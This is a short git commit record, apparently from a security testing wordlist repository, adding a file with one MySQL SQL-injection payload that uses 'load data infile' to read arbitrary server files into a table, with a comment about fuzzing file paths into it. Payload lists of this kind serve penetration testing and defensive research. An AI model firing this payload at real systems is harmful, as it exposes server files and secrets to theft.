Many additions to the repository...

This commit is contained in:
Daniel Miessler
2012-08-26 20:04:09 -07:00
parent 6f52e9bd4a
commit b9e6418c48
113 changed files with 824123 additions and 1 deletions

View File

@@ -0,0 +1,3 @@
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;